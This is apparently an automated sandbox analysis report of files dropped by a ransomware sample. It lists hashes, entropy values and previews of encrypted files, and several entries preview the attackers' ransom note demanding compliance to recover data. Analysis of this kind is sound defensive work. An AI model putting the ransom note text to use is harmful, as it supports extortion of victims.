                                                              Preview:ph.E..b...p......yr..Fq....B..."v...G..k.r?^.......q:.."2....y.9K*...h5.T.....MY}..p.T..k.......+.*....:..h..k...tyO.[..%2.......w..9.......}...V.s.3....0.".t.O....X.:......@.z..".@z............@...*.sVe...I:.D.....g%..?.J.kZF.eg....M..\..=.jq~..~.p.OPm=.....VMF..J...%.. ..kS...!..R.@.4,.~... ....l...kL.)raZ..Cf.Ym......Ty|^.").Ms..g...i49..=..C|#......O_.....k/.Dz...Gz..].Pt..h.m.../;.+5_.aMC..<H..yx..IeJb....L.D...Q..J..+w|0Y..c.3..A8.(.V..eR...Q...YT0.v.(...n.....\..g.V.Wy].t".....R..._6..I.6*-..".......Fx..v...u'\..|.i..M...U5.......0U....7H...E..Vj0=l.Y......c.....$.O.pO.R..p9c....+.Q.M..H^..o..+e:N...I_..]._$....Z.C.g1k............>R...,A.p.r..?..D.r.!k.q.o..i.:y<C~.A.QU.2......u...........[y6....z%>....;.8...~.B....bA................+...A/.....A,+Ov.C..j....H._.w...8.x..(f7..wN.....`"..v$....J|.Q..k?.".q.xD.*.o+.....IH...{.)}'.i.9Y.>.....i..7..g..C.&"|.BtV....K".d...J...uC-...5..$.@.,...*.@.rI.PG...I....G...o6.qu.1.....o..)C+ANOi
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.856108805449118
                                                              Encrypted:false
                                                              SSDEEP:24:UbKC2rMTwPJq8yCMNlCaX8a+boszz5Ewhm5N3lnrMMjhco:UbGAw881Il7M5iwhm5N3VMoH
                                                              MD5:DC7E38613443397251325AF9BC6EE73F
                                                              SHA1:49F70664D5543D8CDF5AE2F449030EE62850F168
                                                              SHA-256:9B72B4D2BB293BC6B950D23B514285177686BB9B70FFCA409373E4636648BA72
                                                              SHA-512:EC8351B224242F9F577FB5E99282AD7B378455A65AF16D9C8E2577945F2AFBBC22DEB9C995AC601B68EDAA3104C3AA67A6A0F66012C4C396D96512975424F402
                                                              Malicious:false
                                                              Preview:.II...6.<.n....e\.)!D.u......t$slq0]Zw.S........4..1......Q.X....k72.#. @..a!.*..Ef.^.s....=.....8.5..F....S..?.F.EcvwT...+.3..g.H.3.OD.k.U.'DL+....,....L..>.a;.l.}Aa.s.\..ij.v...s.|..&0V..T.0.....4r'..j..0f.r.......tH.+..N'..<...=./...Ub<..b.#..<....F....VL]`....#x...i.2/.9.Nc6...'4c.x.P.Q{....v...<.j.).....~uU.".I..7...<....}~.....sI...WWY(.W.'.A.K...r...s.!'.....^..-2}.BL..Y.....E..1..L.J6l.F...1..2Yz..<.+.BZ.?...S...Z..V.r1..@_H.......%5N0....V.E$...h...g....n....|..]....J.C.xA...>? ..s.j.......M*..A.:..|.*.w.....c.C.I.Z...h......>{m..L....,..l.8..SA.Gr.*R..&I/e..O......PVE....j.?kj j3^..h.....u..v.Z.N..$$.b...N..........T-l..".@........r;..(.<iSz...t..`.. (.}W...J...;.87N....".....m,...N........-S.N......T@.^$..!..[..DC.KW.f0\[...2......-GOqS...%{....}=I<...9o.x..t.z/`)Eg.#.w....E.._U.i/[..n@....0.....0_(.....=@...[?...N.HB.6M.'..].~b9P6.t.O{.[9s.z..G..B.d%../...:..]..$.....b|2..T.Y..).....t3V.a.Tq.y...|...8.LV0...\.w..S.SQ..0..]..K..A<..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.847807405034127
                                                              Encrypted:false
                                                              SSDEEP:24:n6EjXdE1jWkAeCd2GgkTznhsb/Dx7UoVPRdMKvoFpQ2nrMMj/jR:6YCjPCBgkvhILBdfqQAMo/jR
                                                              MD5:26B965932A03F93CE1D4E3F743C52C2A
                                                              SHA1:4FFD0FC7D564017901B5197F8DEEF235259DD7AC
                                                              SHA-256:C99E705DA9CBD4BBB6A1E5517806217B7B16957A7C7ACFC204F8F26A8D26A9C7
                                                              SHA-512:AFBDF4E101E3352C6F319466D6FC854DD49408A3845D693D7D5837365DF49BEEA7F0561E3ADCE8D046E918563267BC32F69D901B20035C8520AFC579017D2F75
                                                              Malicious:false
                                                              Preview:A=.z.%1..9.....,........`...|...a.G..O.....k;..........Z.lyW....p.HE...A;5.)z.v.}s...]p....j9.Vd........X6...).....A/..v=..LE...57......bj.b.PW.%..+{%.?....*..?[P.....I...5..m......C....i..?.0[.hXYh(.!.e..q..j...Hg. )............].OG.w).rk....k?P# ...S......nr..'X%..;..y....z.....W9......M..Z.Z.1..k... tr.S2B(8>*..%q.....M...~.L\ ...O.;..9Kw.a....j!.....1....vfLeU..E.y.#.Y."b.......Y...1..C.1.... ...i8VP.y....5..)k...K#...n..V...>.i1.0.....8.......0.q\0..f.m...x"Y..}7..6.*.g....F....l.;...e~..%....c.o...-5.t.g.X......qM..|..".$V....k...#..| \.hc7....>%..8..l)..K..82.y.m..SK...0.d..Y.XD?%DE.....H...x.%.B.,.r........t&l.|{./.=...{...L.:...W5..yf^C.6..44..0.Kz)...{4....I.I...1..Q...9.....Y.'g.!..u.[R..d....V$BG.2R.g.db...0...R.....<.y...(...H.t6..ST)..x..../.../..b1....*.%z.O..V.9r.c%@.r.[_z..=V_....M..Di...p1B.m..z......a.q..@....Y../%...6iT!..X,~.......xi3..T....."..R.d<.s.2.h4.Zs!...9.....In..Z.}|'VFR.......{..?.."p.&....m
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8346698754357424
                                                              Encrypted:false
                                                              SSDEEP:24:SdFYGp9w0hfQn9WgzYXZ9UHwB85CyRXYCTLFeEGpnIVMlnrMMjFG:A9wSfu9WgEAHgSIClLGZVMo8
                                                              MD5:5A9BED4A2391EA1491274BD584D291CF
                                                              SHA1:D04A80E392CE65DC2856B7646052DC827463FEF4
                                                              SHA-256:48EC1F35EC16A199B8071A2F3AD4032259970DF368D15AACCB23BF02A932D803
                                                              SHA-512:DBA7F0EB9CAAC95FADEDC9A1C1D020AC11775D0B5AA4C60751AA61059F6A7DFF091B7789D2C7F5587959FDB73F872DEDC7FC5C397107F15C6504B0B93423BCB2
                                                              Malicious:true
                                                              Preview:.k.....Y...g[...0......*..AL.g'..".L..q...t..Q...R...h.d'.#/.a.`..i{.]. .g...7.......m1H(A.&*._U1..W2..r..|Z d.zI\.....f.0.eo..&(..F.}-.\]./......!......W^c.dJ..R.....?..y.K.7.......-.x...k.."D^.%.N `.._Rg.c.....Q0....="...f.g.'..A...j../..1PJ*.&a.....b..t~.".O...Y..1.Eke......1X..C}..q....D......C.........Q.f=t..J.....i..(.*`..eB.Q..H.3.M..96..t.....v..m/k..h.....6..z.&.6.].;.].....a........}8;...D.UJ."...;....O..0..G..uT./...9.u..A........oTn.h..+...%E.........'.K.........%....]\+...\..UUy.r.|..K..dW.w.]-....t.3QYI..yt?C.O.....|.[:wId.B..........Y....ZE.B.Y...qpgOZ....d.E...84...!.*T.....wW:.$.v6%.t..;y.(....j-.U)...x...O`;.'.....oL.NS.......`.....BYC..:h........Au5....\C._..YS....<...6..xZ.....b.Q.../j..j#G....q3..5,....D6S=...'..-K.`......g...T.+..d..A.-.0......C(['.r9n...c+.....D.dS.,4..v...v.......<}.P..tYL...gJ.G."...v......D...2.6..m.)..I..e...r+?...0..}K.......f21......aN......6k.=T....1.7h..]o....~W....{I...P..Z..s.K...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.84071411605203
                                                              Encrypted:false
                                                              SSDEEP:24:fwfK2PxIINh1ws5YOX0j34ntsE6VHhW//bynrMMj4j3:fwnPVh6suvjontsE6xQ//b0Mo4L
                                                              MD5:6DAF5BC801DC58200EC416254D15DB91
                                                              SHA1:335564F48EC31C0C7E159DE6F3424694EFAC7094
                                                              SHA-256:57BC1A286F23A629AE1A5D0842E009D1E7FCDA5430EEB755D60745B23BEBF50F
                                                              SHA-512:083951F705FE7171E6D6C10E124F6EC2DAC9FC5DFA3AE34FA6E3EF0C9A539D6CAC394A9BE7F347062DC2C707A4DD6A73C73B8DADEE09703485EB3286C64ECED8
                                                              Malicious:false
                                                              Preview:..O%.>...0..C.3>.l.[>&.Bz.H...G..e...&)Lp.....$.$$..s...o.<.;.n.7./..^7."..m...o.970./.Di.e....l....~.E...p...7...Y........y.._....a.......gvS2J2*M...v.Y.5...LKQ.i.-.d.).N[,j...|....BC...4.2']9.Q3$...\.7.+.Q.J....7h^ftY..4.4..\.RO. ..U;.Y....j.r...w.d...W^..L.9..x2....W.j(.. .... .."..M.......x.....*.C..=3....Z.....C..}..s..U.#....m..m.....Y.6..d....K......Rs...p......mDT.V[..#..V.l........^.......VQ........XAx.'.Y....f=.g.F]..:\K.......A}.V....L.....!@.I.^.zX..a.).J\@mg8.\...O.."....Q.FP*..Ac.@yN<...i.k..\|.r.d.....3.:....C.t1..A:E..J#.:.....j. g..o.5..V.......Y'....p.|..!...%....p.............A(du.pD.qp..g.D..v.5...p..3j.L<..b.K%....*f'....=L.?.?/u......'+..{....k&..jzdO..~...FE....R........_S..Y.s,.#.)9.>qdQ,3ugY(;....(Ht.r-.q..x....._...J..5....S.....Yi=U|..?..m. .p$.,0.gXF.;.8.w..&..t{.-......%MlD..s...`VL.#....D.G.../]....#..a.3.r.F..[..L....}....g...AtHU.b.....)..F.][..p.7,..Z.b..."0.K.4...E'bo@."F..}8.......l}..iu..s...}d....{.HM.#Dm.u/.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8314277982663345
                                                              Encrypted:false
                                                              SSDEEP:24:GcvpVc/VTPfL4J5NR3QvdwM4mwmm2+Ymuu4rlolHnrMMjEcn:G0r2Vn4JbR3QVwMa/oYQcLMoV
                                                              MD5:2FDB4F9FDE39302FB09BBFFFC312CFA1
                                                              SHA1:5D2C5E7634E0F2675F15AE53A8D3CE09FCB8C0EB
                                                              SHA-256:6059AC6DFE05B456B43FF82411B9535236F83F942C8DABF8987B3BDDB051357F
                                                              SHA-512:4742832C4C7609CBDF5DED62E2A856F80DECDB9DDC5CED9E8908A1A7D9A6AED9DB4A9CCDBFC4A07304C88348448ADA73E12FFB161F541A62F807BD4B989E1CCE
                                                              Malicious:false
                                                              Preview:.&...0.=#.gA58OY.X>.....'.9.._n.hi.|..#.5A{J.'v-..2/y...?.3.uuq43....(.r.....@.u....^.......z......G..y=....z{m.EC..g.....'M.K..<lO....B.....h.|...@}.u3.3J.m.u..y9.6.Pc.oc....A.%LL...R....U..C..)I.....0.7g.Dl....5.}S......S.:..l.r...1.wf..~0., /.#c.y.}.......%S.\.....Z.F..p.?..OQ..?y.H......H;.yQ:.H...9Xa......2..w..BT...i8.(6.:..[.........2.s.%I...Zo..W.?...-.....B.~J...t.Li~..m6....?W..M#..K.)Y.J....N'.:....&F...,..C..G5.......t0..U.......xX.i.yv....l.).......F.aG..:wm%.D..q=..j\$..+~."...9....I...nR...&.*.$.}.l.EN.S.>b....z.mi...;s_p..x}.[."`..U....|.iq...M.9\..}~....C.~..._....e9.$...6O.p....v..1...<=.!..Tw._..?Q...P.S..6...N4.J...F..iT..p$.|.....{.6.TaZ..............9...B:..M.a39.O.F].zn.-.\.....a.W.>Yo...tn.c.3.:....0....J.k.H...b.U2t.>.Aq...<h.F..v.>..!..K........m_.......s....l@..[....D.B.P>.~.M..>D..o.V.6X..X0..COL..+.y.|E@...B.<.-R..k.y.L..&S.<.R..a.4....3....F\(.E......\..'@..a:.O..r5...........2.uX,s*....;.Mb.N.<8.b......'Z..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.850015777512796
                                                              Encrypted:false
                                                              SSDEEP:24:vpAtdcnjeywL3fuvPHFVjIykAK+RULEBrvBJWe77EaszxoPyxnrMMjv:vutduenPuvvzIy1RULEJjMoaJMov
                                                              MD5:9C2AFE8889D0A7212757B691B1E02C8D
                                                              SHA1:15CD56E66DD25AFF408442CEB97BA2EFFE3B92C8
                                                              SHA-256:B573230D310B783B656C799B19085BFA25FB600D640AFB71A3DC62776CFF8109
                                                              SHA-512:3AB7389C51ACC627E339D70B205002901B55957A738F376749738FD5C1AC7DC545530021F8D525D4C04ABF975121A67B4FBB8939B1E77B3E93AC26453A5E3018
                                                              Malicious:false
                                                              Preview:..\..l...pc.....r...L......6....pA.,.a..J.C2\.o..6F..yX......IY.*.....xD|..;...Z..V?.m.)A...dLM...A.....?.....T..72..>...."..W..o./..o....R.\Z.....!..X..W...E..C0.<.H)*gj./........!`...S...:q.o...G\../..R.D...9....&...........3ogr.8....X......l..z.[Fw..".....*....A..7..h...;..{F..o...$C....`..M..J<.E.)R5.4.......%..s...>...MV.].n.=XP~..Gr.....+..P.....z.:...a~........m.;.`..q...W\[e...^.0.H.......I...8;=l.&...a...b.b9L..>....^}....*...)T..a..A.......A..|..P....U.[..V..m...&..[....".>..6..3x>.....l.^J..d.&..$..e..m....r..u.H.K..%....\R.........k..%.4.....j.p.....0.........0.j..w.....!..W.@.H..E.../n...n. A.=.L....W.........j.`...B...x.ci...0{.....Cvz...S.F.tj..........$...6l....+..@...F...w.....%EP.x.td/...pT.Y...k...-k...e..A...)YO@..4.k.s..%..v.Si....u....4.q.p8.8a.....G...f....[.<..._....=.[.G.7.@....MA..2...R...0Rnc.....A.%....5..]W.Z.3.\.4.8E...OF.z..]|...%..TD.K... T.:K?. .oc|.X.e.lNy......%..+"...0...w=.....'..b6........H._
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:OpenPGP Secret Key
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8475805214984575
                                                              Encrypted:false
                                                              SSDEEP:24:JAZmbMkSOZOHl8OliluKRcgmcj5VFA9JSpxApWBicynniEgjKuF69vNPnrMMj6:JAZNk6Hl8OhKRVmcj5VFAapqWBijnvOz
                                                              MD5:E8A444E9610935EF3BAE8325322154AF
                                                              SHA1:0ED1FD2F500B0C5A3559ED229BC608FBC0BBFD79
                                                              SHA-256:38D33489B62A8FD52E057D4ED4181067ACE362F0C2E95FA9CC2B64BE36691B68
                                                              SHA-512:595FB9CDA8EA3A408882A2D39DC8CDA73AE24F09BDB3E7E83EA0FBA2C90975C21589ADFFD8FAB121678E7ED62C2D7FBED4B3B91DCB79EE09A4A7902DC4F315E2
                                                              Malicious:false
                                                              Preview:....Xx!...'...*.6.:....h!.....ma.!........._...z...T........)...x.m.j8..V7.V.....".1...f..G]...Fy~..[..o..e...u.{(.....).@...?..p..f9y~.....M..,c..../.<..0`^G..,.).$..>.ITi..[.-.s..."Y..l.Wn..u..W..!/W[...s.,.c...X..V.!...$:.4...;.4.....E..g.i.N...p..N....mt........iK.|..P.\..1ej.}.u......W..A.Jh.d..na.\g..F.&Oy\]..u.I...r...LO.M...,...../..osRL.+....U......).U\.2....s.._.Dh..........^_.#..K....7....ie....k...V......@E..Y..I.3.ZA8...P.M...#...f........8...v..;MN.@^n..`k.h..8....V`)s.m..Eh-.<...Sv ..X........\CS.n.[u...:k*Gk........ZI4g.E.Mw..V4n..-...v........v]..!.<.9A.C.%j..H.....fL.H.k...%.M.*.V.*..gH"..f..>(....-..C..*E.P4....[.....`.x.M.......[.`...8.s."/"X.N._.......m..rLF....E.{a.K.$...b.....#\..\..#.H..'H.0<F...[9........*..._...(...e..;c6.3}...si.F.Dk.*.D...J.)...=.<Hv.7..A....].s(z.....<:.@..5...=....G...}.A.f*....['w..i.Q.....H6....`.#..s...B.,......t.....A.tS....b(. q.......%7.X.y..w..i..?()....QX.o..b..0.C)Ot.X.ct^T..^B...}
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8417369523044425
                                                              Encrypted:false
                                                              SSDEEP:24:wN6tLV9e7NsHf3zhfmEZ4EA7Kn+3i/niYt6L+y4snrMMjFb0G:06FVY5sFfX67M+3i/niWbQMoF4G
                                                              MD5:B5250151F67DA711260865C4D7FE503E
                                                              SHA1:CBFE5E09A1A5FAF26C0E5092357AA89478A2FCF8
                                                              SHA-256:191AB215409C0CEC33AC154C5FCD5B2287D8A446E12BBC43BBB9143CA1B3945F
                                                              SHA-512:B86FDFF01B3681B1DB3DBD008E547A96DE90985403A0127C6455AA174E28594D6BBDB673F37BBB0BA4A524F14F43EB76C076180DAE82A16F61295F4A64343588
                                                              Malicious:true
